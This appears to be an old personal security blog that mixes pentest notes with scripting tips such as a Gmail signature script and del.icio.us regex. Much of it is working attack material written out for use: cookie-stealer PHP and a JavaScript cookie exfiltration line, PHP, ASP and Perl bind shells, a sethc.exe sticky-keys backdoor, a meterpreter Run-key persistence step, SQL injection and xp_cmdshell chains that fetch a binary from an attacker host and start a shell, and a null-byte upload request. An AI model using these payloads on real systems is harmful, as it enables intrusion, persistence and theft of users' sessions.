Session redirect in php and asp

These are examples of correct ways to handle access and redirects in sessions in asp(1.0|vbs) & php.. I dont know how may times I see this done wrong..

ASP example

<%
If NOT Session("Authenticated") = 1 Then
Response.Redirect ("login.asp")
'Response.Redirect ("login.asp", true); '<= This is the same as the default
'Exit ' <= This is called with default True statemens as above
End If
%>

PHP Example

<?PHP
if ($_SESSION['access'] != "yes")
{ header(Location:login.php); /* Redirect browser */
exit; /* Make sure that code below does not get executed when we redirect. */
}
//Code Following Should not be executed unless authenticated.
echo ("secure code");
?>

Note: Since PHP 4.4.2 and PHP 5.1.2 this function prevents more than one header
to be sent at once as a protection against header injection attacks.

Month of ... bugs

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.

Setting and Confirming reg keys w/meterpreter.

super quick meterpreter sequence
Prep

upload c:\\sbdbg.exe c:\\windows\\system32\\

Set

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"

Verify

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor

Use

(reboot)

Comparing Common Vulnerability Result Sets

One of the major things I've been working on is bring together vulnerability result information. I found that it was a major pain in ass to be able to remove duplicate entries from result sets. I was finally able to come up with listing for based on CVE / BID tracking numbers:

An example corresponding file could be something like this

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.

Pentest Order of Objects..

ISSAF was used in conjuction with the latest backtrack release.
Although it is not my company's standard it is quite close.

Not to be too open.. but this has lead to a really good idea for object orient coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)
GAINING ACCESS AND PRIVILEGE ESCALATION
-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Priviledged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

SBD as netcat

Yeah so I rattle off some SBD stuff sometimes.. Im referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ http://tigerteam.se/dl/sbd/. This is my perferred "swiss army knife" because of its default configuration of encryption(AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command).



Netcat and its NC Clones:

• netcat - "swiss army knife"
• sbd & sbdbg.exe - shadowinteger's backdoor
• netcat6 - swiss army knife+ for ipv6
• cryptcat - netcat with twofish encryption
• socat - Multipurpose relay(netcat++) IPV6/SSL Example usage:
  socat TCP6-LISTEN:8080,reuseaddr,fork PROXY: proxy:www.domain.com:80

Simpler tools:

• nc.pl - perl netcat-like implementation
• netcopy - reciever
  
  
• netsend - transmitter for netcopy
• urocat - simple cat clone
  
  

None of this is news.. I just wanted to point out some of this simple stuff.

sbd fun as a rookit via sethc.exe

SBD Fun

Transfering files

RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10

Transfering files through .tar.gz

RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337

PORT Scan:

echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000

Using Cmd.exe to bind to service
In my experience this is flaky at best..

create then start service:

sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc

Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).

SCM starts a service
RegisterServiceCtrlHandler API

We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}

Rootkit portion
Rename output binary to sethc.exe .. works ok.

Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.

Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.

Can there fake handler for WM_CLOSE? or terminate...

PNG Listener w/logger

This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)

<?php
$cookie = $_GET["c"];
if ($cookie == "init")
{$file = fopen('001.txt', 'w');
fwrite($file, ":: 00* Logger:: \n");
}
else{
$file = fopen('001.txt', 'a');
fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
}
?>

I developed this snippet while working on a solution for browser history leaks.

SQL injection and identification

Identify sql Server through Blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

MySQL is at least 4.0.17 if you get a different result.

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack

$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--

MS-SQL

Check if we are admins

IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))

Check things like
MSSQL_OPENQUERY

(select 1 from OPENQUERY([$servername],'select 1'))

MSSQL_OPENROWSET

(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or

(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))

If we have a linked server and sa

select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa

select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things todo

select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

reverse-shell from SQL server

So you go the super secret sa password (or they left it blank~?)

osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"

{SQL template}

osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"

Pull data back to SQL:

c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe

Or be obvious:

net user add

On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe

{SQL template} set up FTP command script:

ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp

{SQL template} Execute FTP script:

FTP -s:script.ftp -A semi.evil.host.ip

{SQL template} setup reverse shell:

echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat

{SQL template} get time on server:
Dont forget ICMP timestamp requests instead..

time

{SQL template} schedule execution of bat file

at \\sql.vuln.box\ 04:20 evil.bat

connect from any.evil.ip

sbd sql.vuln.box 4337

Just some simple shell notes:

Image inclusion
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images

PNG Headers

\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width

Comment writers for jpegs
edjpgcom

Basic php shell

<?php
ob_clean();
system("[command]");
die();
?>

Using Echo
For windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.

echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

unix:
write lol from echo with hex (no newline) to file

echo -en "\x6c\x6f\x6c" > file.ext

SBD (netcat style):
File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

although plink -raw and telnet are not as good they can work.

Play with Cookies

Simple cookie push

<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>

Cookie View

Javascript:alert(document.cookie);

Manipulate Cookie

Javascript:void(document.cookie=“variable=value”);

stealer.php

<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

Other stealers

<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4

global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");

echo "<script>window.location.replace('".$Redirect."')</script>";
?>

Perl shell

#!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}

ASP Quicky whoami ?

<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>

ASP Shell
- WshShell.Exec error '80070005' likely

<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>

Curl into older PHP servers from chroot skeletons.

<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);

$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;

print $data;
?>

Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg

CGI null byte stuff too..
see... php null byte

ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA

Gmail HTML Signatures - GreaseMonkey script

So of course you cant create html signatures in gmail... ergg!

Silly rabbit, you can drag and drop images/html into the gmail Richtext editor...
well that just will not do.

So that would mean - greasemonkey script! Im not going to waste any time here.
GMAIL HTML SIGNATURE - Install this Script

//
// Released under the CC Attribution 2.5 license
// http://creativecommons.org/licenses/by/2.5/
// --------------------------------------------------------------------
//
// This is a Greasemonkey user script.
//
// To setup, insert html signature code into:
// * html_signature
// --------------------------------------------------------------------
//
// ==UserScript==
// @name GMAIL HTML Signature
// @namespace http://shad0wbq.answorld.com/
// @description Insert HTML signature into GMAIL
// @include http://gmail.google.com/*
// @include https://gmail.google.com/*
// @include http://mail.google.com/*
// @include https://mail.google.com/*
// ==/UserScript==
//
var html_signature = '<div style="margin: 0 auto 0 auto; margin-top: 5px; margin-bottom: 5px;" >' +
'<a href="http://feeds.feedburner.com/Codeburst">' +
'<img src="http://feeds.feedburner.com/Codeburst.gif" style="border:0" alt="codeBurst"/>' +
'</a></div>';

window.setTimeout(function() {
//Debug Frame window
// alert(window.frames[0].name);
if (window.frames[0])
{
if (window.frames[0].name == "v2_hc_compose")
{
var logo = window.frames[0].document.createElement("div");
logo.innerHTML = '<br><br>' + html_signature
window.frames[0].document.body.insertBefore(logo,window.frames[0].document.body.lastChild);
}
}
}, 600);

del.icio.us Regex

I was working on bring in my collection of bookmarks for use on del.icio.us. There is still some work to be done on del.icio.us web interface, and most of the API apps that I used just didnt fit the bill so some quick regex helped with importation and exportation.

Main use for this was to enable sharing on all imported bookmarks.

So we need some regex for implementations on the api.

del.icio.us can read and export Netscape bookmark files.

<meta equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Bookmarks</title>
<h1>Bookmarks</h1>
<dl><p>
</p><dt><a href="http://www.testtest.com/" last_visit="117002438" add_date="117002438" tags="wee,w00t">test test</a>
</dt></dl>

These can very easily be modified via regex to work as api calls
Example API calls

https://api.del.icio.us/v1/posts/add?&url=http://www.testtest.com/&description=test test&tags=wee%20w00t&replace=yes&shared=yes
https://api.del.icio.us/v1/posts/delete?&url=http://www.testtest.com/

Regex Convertion for del.icio.us

(<dt><a href="http://www2.blogger.com/%29%28.*%29%28" tags=")(.*)(">)(.*)(</a></dt>)
https://api.del.icio.us/v1/posts/add?&url=\2&description=\6&tags=\4&replace=yes&shared=yes

Dirty Listing of Nessus Dangerous Plugins

Tenable Nessus .. needed dangerous plugins descriptions

cd \progra~1\tenable\nessus\plugins\scripts\
egrep -l egrep -l "(ACT_DESTRUCT|ACT_DENIAL)" *.nasl>c:\temp\dangerous_list.txt

Quick vbs file..
Copy files from list in files to temp.

Dim objFileSystem, objInputFile, fso, aFile, afilename
Dim strInputFile, inputData, strData, strListFile, i

Const OPEN_FILE_FOR_READING = 1

' generate a filename base on the script name, here readfile.in
strListFile = "c:\temp\dangerous_list.txt"

Set objFileSystem = CreateObject("Scripting.fileSystemObject")
Set objInputFile = objFileSystem.OpenTextFile(strListFile, OPEN_FILE_FOR_READING)

' read everything in an array
afilename = "c:\progra~1\tenable\nessus\plugins\scripts\"

Do While Not objInputFile.AtEndOfStream
Dim Line
Line = objInputFile.readline
' Do something with "Line"
Set fso = CreateObject("Scripting.FileSystemObject")
Set aFile = fso.GetFile(afilename & trim(Line))
aFile.Copy("c:\temp\scripts\" & trim(Line))
Set aFile = Nothing
Set fso = Nothing
Loop

objInputFile.Close
Set objFileSystem = Nothing

WSCRIPT.QUIT(0)

Grab nessus extract tool via wget
Dump info to file .. done.

wget http://cvsweb.nessus.org/cgi-bin/viewcvs.cgi/
*checkout*/nessus-tools/nessus-extract/
nessus-extract.pl?rev=1.4.2.10&content-type=text/plain

perl nessus_extract.pl -p "c:\temp\scripts" >c:\temp\Dangerous_Plugins.txt

Apache redirect direct linked images...

don’t direct link images .. bad things happen

RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http[s]?://(www\.)?yoururl\.com/.*$ [NC]
RewriteRule \.(gif|jpg|jpeg|bmp)$ redirected_image.jpg [L]

- credit fif3

Detecting VMMs - virtual machine monitors

Red Pill...

int swallow_redpill () {
unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
*((unsigned*)&rpill[3]) = (unsigned)m;
((void(*)())&rpill)();
return (m[5]>0xd0) ? 1 : 0;
}

redpill.c

redpill.exe
TrapKit.de info..

VMware fingerprint codes
scoopy doo - A VMware Fingerprint Suite

jerry - A(nother) VMware Fingerprinter

Northern Virginia Security Groups

NoVA Sec

Pure technical gatherings for security professionals in the northern Virginia area. Check your certifications at the door

http://novasec.blogspot.com/

OWASP NoVA
OWASP chapter meetings are free and open to anyone interested in application security.
http://www.owasp.org/

MOAB / MOKB / VIZSEC '06

Well to catch up a little on the vuln world.. There's a couple things I'm watching.

Month of Apple Bugs

Info-Pull's MoAB

PoC/Exploit are included with every release.. how nice.

Month Of Kernel Bugs

Info-Pull's the MoKB

Numerous Kernel bugs listed for FreeBSD 6.1, Linux 2.6, as well as OS X.

---

Retirement of Elsenot.com
Else not has officially closed its doors for updates..
"ElseNot part one is done. ElseNot part two may or may not start." ~ Layne

---

Conference VIZSEC '06

The preceding for the conference held on November 3rd 2006 have been posted. There are alot really interesting white papers.. here are a couple of interest..

2D Visualizations

"VAST: Visualizing Autonomous System Topology"

- Jon Oberheide, Manish Karir and Dionysus Blazakis [whitepaper] [presentation]

"FlowTag: A Collaborative Attack-Analysis, Reporting, and Sharing Tool for Security Researchers"

- Christopher P. Lee and John A. Copeland [whitepaper] [presentation]

"Understanding Multistage Attacks by Attack-Track based Visualization of Heterogeneous Event Streams"

- Sunu Mathew, Richard Giomundo, Shambhu J. Upadhyaya, Moises Sudit, Adam Stotz [whitepaper] [presentation]

"Visual Toolkit for Network Security Experiment Specification and Data Analysis"

- Lunquan Li, Peng Liu, George Kesidis [whitepaper] [presentation]

"An Intelligent, Interactive Tool for Exploration and Visualization of Time-Oriented Security Data"

- Asaf Shabtai, Denis Klimov, Yuval Shahar, and Yuval Elovici[whitepaper] [presentation]

"Visualizing DNS Traffic"

- Pin Ren, John Kristoff and Bruce Gooch [whitepaper] [presentation]


3D Visualizations

"Interactively Combining 2D and 3D Visualization for Network Traffic Monitoring"

- Erwan Le Malecot, Masayoshi Kohara, Yoshiaki Hori, and Kouichi Sakurai [whitepaper] [presentation]

"Real-Time Collaborative Network Monitoring and Control Using 3D Game Engines for Representation and Interaction"

- Warren Harrop and Grenville Armitage [whitepaper] [presentation]

Adopting 10 good habits of Unix Scripting

I saw this on a quick fleeting moment on slash.dot .. It covers many things that I have done in the past..

1. Make directory trees in a single swipe.


2. Change the path; do not move the archive.


3. Combine your commands with control operators.


4. Quote variables with caution.


5. Use escape sequences to manage long input.


6. Group your commands together in a list.


7. Use xargs outside of find.


8. Know when grep should do the counting -- and when it should step aside.


9. Match certain fields in output, not just lines.


10. Stop piping cats.

Command Line Event Viewer

Every once in while microsoft does something correctly.. Found the command line event viewer.

Using command-line tools to manage events and event logs

You can also use command-line utilities to create and query event logs and associate programs with particular logged events. For example, you can use Eventcreate to customize an event entry to a specified event log. Eventquery.vbs is used to list the events and event properties from one or more event logs. Eventtriggers enables you to create event triggers that will run programs upon the occurrence of specific events.